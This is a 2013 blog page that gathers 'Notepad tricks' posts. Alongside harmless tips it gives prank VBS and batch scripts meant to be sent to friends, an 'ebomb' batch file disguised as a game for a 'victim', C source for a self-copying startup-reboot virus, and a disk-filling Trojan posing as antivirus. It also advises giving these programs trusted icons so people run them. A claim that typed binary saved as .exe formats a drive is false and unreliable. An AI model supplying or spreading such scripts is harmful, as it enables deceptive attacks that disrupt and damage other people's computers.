Latest Games :

SHEKHAR BHALERAO

Showing posts with label NOTEPAD TRICKS. Show all posts
Showing posts with label NOTEPAD TRICKS. Show all posts

7 Cool Notepad tricks to scare your friends

Friday, 19 July 2013 | 0 comments

7 Cool Notepad tricks to scare your friends

We all know Notepad. It's a simple text editor. But today I am going to discuss some cool tricks which you can perform on your computer using simple notepad. You can use these tricks to scare your friends. 

Please Note -  These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.

1) Continuously Pop out CD or DVD Drive:
  • Open Notepad.
  • Copy the code bellow.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Now save as abc.vbs 
  • Send it to your friend now.
 2) Toggle Caps Lock button On-Off Continuously : 
  • Open Notepad.
  • Copy the following code.
 
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  • Save it as abc.vbs
  • And send it to your friends.
3) Hack keyboard to make it type anything continuously:
  • Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
  • You can change You are a fool. to any other text
  • Save it as abc,vbs 
  • And send it to your friends 
 4) Hit Enter Key Continuously :
  • Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
  • Save it as abc.vbs
  • Now sent it to your friends.
5)  Type any message in notepad automatically and scare your friends :
  • Open Notepad and type the following code.
  
WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
  • Now save it as abc.vbs
  • And send it to your friends.
6) Hit Backspace Key Continuously : 
  • Open Notepad and copy the following code.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  • Save it as abc.vbs and send it to your friends.
7) Show a error message and shut down friends computer : 
  • Open Notepad and copy the following code.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
  • Save it as abc.vbs and send to your friends.
Continue Reading

Create a fake virus infection to the system.

Wednesday, 17 July 2013 | 0 comments

Create a fake virus infection to the system.


  • Open Notepad(Start > All Programs > Accessories > Notepad). 
  • Copy the following code and paste it in notepad.  
set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "notepad"
wscript.sleep 2000
wshshell.AppActivate "notepad"
WshShell.SendKeys "Scanning........"
WScript.Sleep 7000
WshShell.SendKeys "{ENTER}"
WScript.Sleep 500
WshShell.SendKeys "Your "
WScript.Sleep 500
WshShell.SendKeys "system "
WScript.Sleep 500
WshShell.SendKeys "is "
WScript.Sleep 500
WshShell.SendKeys "severely "
WScript.Sleep 500
WshShell.SendKeys "affected "
WScript.Sleep 500
WshShell.SendKeys "by "
WScript.Sleep 500
WshShell.SendKeys "multiple "
WScript.Sleep 500
WshShell.SendKeys "threats "
WScript.Sleep 500
WshShell.SendKeys "XX"
WScript.Sleep 500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 500
WshShell.SendKeys "Running "
WScript.Sleep 500
WshShell.SendKeys "a system scan "
WScript.Sleep 500
WshShell.SendKeys "by "
WScript.Sleep 500
WshShell.SendKeys "Windows "
WScript.Sleep 500
WshShell.SendKeys "Defender..... "
WScript.Sleep 7000
WshShell.SendKeys "Threats found: "
WScript.Sleep 500

do
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Mdrop-BTV"
WScript.Sleep 200WshShell.SendKeys "{ENTER}"WScript.Sleep 200WshShell.SendKeys "W32/Netsky"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Invo-Zip"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Mdrop-BTV"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Agent-HFZ"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Agent-HGT"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Mal/EncPk-EI"
WScript.Sleep 200
WshShell.SendKeys "{ENTER}"
WScript.Sleep 200
WshShell.SendKeys "Troj/Pushdo-Gen"
loop
  • From the Menu bar, click on File > Save As. The Save As dialog box opens. 
  • Under the Save as type select All Files option. Write a desired name for your file, for example Scan.vbs [Remember to give a .vbs extension to your file name]. 
  • Now Open the Scan.vbs file and see the virus infection!
Continue Reading

Ebomb a virus for fun

| 0 comments

Ebomb a virus for fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type
@echo off
start iexplore
start notepad
start firefox
and save it as anyname.bat (note: paste the code with “start ” in many times to annoy them)
you can also do some additional stuff like enter the message for victim eg. msg * “(Now your pc is getting Hacked)”
and also you can open some websites to irritate victim eg.
start iexplore “www.computertricks.co.in”
start firefox “www.computertricks.co.in”
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it ………….. :D
(Sample eg.
@echo off
msg * “(sorry buddy but you just f*$%d your self)”
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
start iexplore “computertricks.co.in”
start firefox “www.computertricks.co.in”
start notepad
and then simply save it as “anyname.bat”
Note : The only way to get out of any ebomb attack is simply by System restart
Continue Reading

Automatically Download New Music from the Web

| 0 comments

Automatically Download New Music from the Web

These days, tons of directories, aggregators, filters, and
weblogs point to interesting types of media. You can use wget to create a text-file
list of your favorite sites that, say, link to MP3 music files, and schedule it to
automatically download any newly added MP3s from those sites each day to your
computer.2
Here’s how:
1. Create a text file called mp3_sites.txt and list URLs of your favorite
sources of music online (such ashttp://del.icio.us/tag/system:filetype:mp3 or http://stereogum.com), one per line.
2. Use the following wget command to go out and fetch those MP3s:
wget -r -l1 -H -t1 -nd -N -np -A.mp3 -erobots=off -i mp3_sites.txt
That wget
recipe recursively (-r) downloads only MP3 files
(-A.mp3) linked from the sites (-H) one level out (-l1) listed in mp3_sites.txt
(-i
mp3_sites.txt) that are newer (-N) than any you’ve already downloaded. There are a few other
specifications in there — such as to not create a new directory for every music file
(-nd), to ignore robots.txt (-erobots=off), and to not
crawl up to the parent directory of a link (-np).
When this command is scheduled with the list of sites you specify, you
get an ever-refreshed folder of new music files that wget fetches for you. With a
good set of trusted sources, you’ll never have to go looking for new music again —
wget can do all the work for you.
TIP Use this technique to download
all your favorite bookmarks for offline usage as well. If you keep your
bookmarks online in Delicious, use wget to
download the contents of your favorite pages to your hard drive. Then, using
Google Desktop Search, you can search the contents of your bookmarks even when
you’re offline.
Automate wget Downloads on Windows
To schedule a wget download
task to run at a certain time, open a new document in a plain-text editor such as
Notepad. Type the wget command you want to schedule,
and save the file with a .bat extension, such as
getnewmusic.bat.
In Windows Task Scheduler, browse to getnewmusic.bat in the Programs section, and set the schedule as
usual.
NOTE See Hack 64, “Automatically
Reboot and Launch Applications,” for more details on setting up a recurring job
in Windows Task Scheduler.
Continue Reading

Auto Shutdown Computer With Timer

| 0 comments

Home / Auto Shutdown

Auto Shutdown

Auto End Tasks to Enable a Proper Shutdown
This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.
1. Copy the following (everything in the box) into notepad.
QUOTE
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] “ClearPageFileAtShutdown”=dword:00000001
[HKEY_USERS\.DEFAULT\Control Panel\Desktop] “AutoEndTasks”=”1″
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control] “WaitToKillServiceTimeout”=”1000″
2. Save the file as shutdown.reg
3. Double click the file to import into your registry.
NOTE: If your anti-virus software warns you of a “malicious” script, this is normal if you have “Script Safe” or similar technology enabled.
Continue Reading

A Virus Program to Restart the Computer at Every Startup

Saturday, 13 July 2013 | 0 comments

A Virus Program to Restart the Computer at Every Startup














Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.


Continue Reading

How to Make a Trojan Horse

| 0 comments

How to Make a Trojan Horse












Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the.dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

Download Codes Hrere Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.

How to compile, test and remove the damage?

Compilation:
For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

 NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
Please pass your comments and tell me your opinion. I am just waiting for your comments…
Continue Reading

Learn To Hide Files Behind The Images

Friday, 12 July 2013 | 0 comments

Learn To Hide Files Behind The Images


hide files behind images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
  • Video Tutorial On Basic Terminal Commands
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
cd desktop
hide files behind images

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

Continue Reading

Password Protect Any Folder Without Any Software

| 0 comments

Password Protect Any Folder Without Any Software


In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.
Continue Reading

Notepad Tricks: Cool Notepad tricks for Windows

| 0 comments

Notepad Tricks: Cool Notepad tricks for Windows

Notepad, the text editor that comes bundled in Windows is an excellent tool for text editing. But that is not the only thing for which notepad is famous. It is also famous for its tricks and hacks. Here is a roundup of some of the best and coolest tricks that you can try using Notepad.

Matrix Falling Code Effect - Notepad CMD (.BAT) Tricks

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Notepad tricks
Matrix Falling Code Effect - Notepad Trick

Upon running the bat file, you will see the "Matrix falling code" effect.

Make Your Keyboard Type (Any) Message Continuously-VBS Trick

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop
Send this file to your friends as an email attachment to see the fun.


Notepad Virus

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.

Make a Personal Diary(Log) with Notepad (Easter Eggs)

Notepad Diary
Notepad Diary
You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note. To do so, open Notepad and type .LOG in capital letters and press Enter. Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note. Just enter your note and save the file each time after making an entry.

All these Notepad tricks are totally harmless and would not harm your PC in any way.  To close any of the VBS trick given, open task manager and close the wscript.exe process. These tricks work onWindows 8, Windows 7, Windows Vista and Windows XP.

Continue Reading

Create Your Own Game Using Notepad

Sunday, 23 June 2013 | 0 comments

Create Your Own Game Using Notepad

Now you must be having some knowledge about the Batch Programming after reading my previous post. Using some commands from the Batch Programming we can create some simple and amazing games of our own

To create your own Batch game, you should follow these easy steps:


o    Decide the story-line of the game: You should draw a sketch of how your game will work. Remember, creating games in Batch script has limitations. You will not be able to create more of a game than a text-based game. It can be a quiz or a scenario game, but you will have only text. As to whether or not you want to have ASCII graphics is up to you, but the game will still be based entirely on text input.
o    Learn the Script and Commands: Batch script is not very hard to learn. You should have some knowledge about some important Batch Codes. Some of them are as follow: 

echo
To display a message on the screen
title
To give a name to the title bar of the window
color
To set the color of the background and the text
ping localhost -n 5 >nul
To delay the execution of the following command by 5 seconds [you can change the value]
set
To declare a variable
if
The if command is used to determine what will happen if a certain event occurs. After the if statement (if [something]), a command follows.
cls
To clear the screen
goto
To go to the label mentioned [goto Label] and execute the block under the label.
:Label
To create a label. That is to provide a name/tag to a block of the program. [you can name it anything, even :a].
pause
To pause the execution and ask the user to press any key to continue.


Continue Reading

Format HardDiscDrive using Notepad.

| 0 comments

Format HardDiscDrive using Notepad.

Notepad , though many people find it as simple useless windows application , it can do many wonders like If you think its not possible to format C: drive when windows is running then try this Simple Binary Code

 Type this in Notepad

01001011000111110010010101010101010000011111100000

Save As An .exe Any Name Will Do

Send this .exe file to people , your haters or try putting it in cyber cafe's 
  just for fun , LOL
well , this will format C:  drive !

OR

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000



Similarly Format your drive D:

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000 


Continue Reading
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. SHEKHAR BHALERAO - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger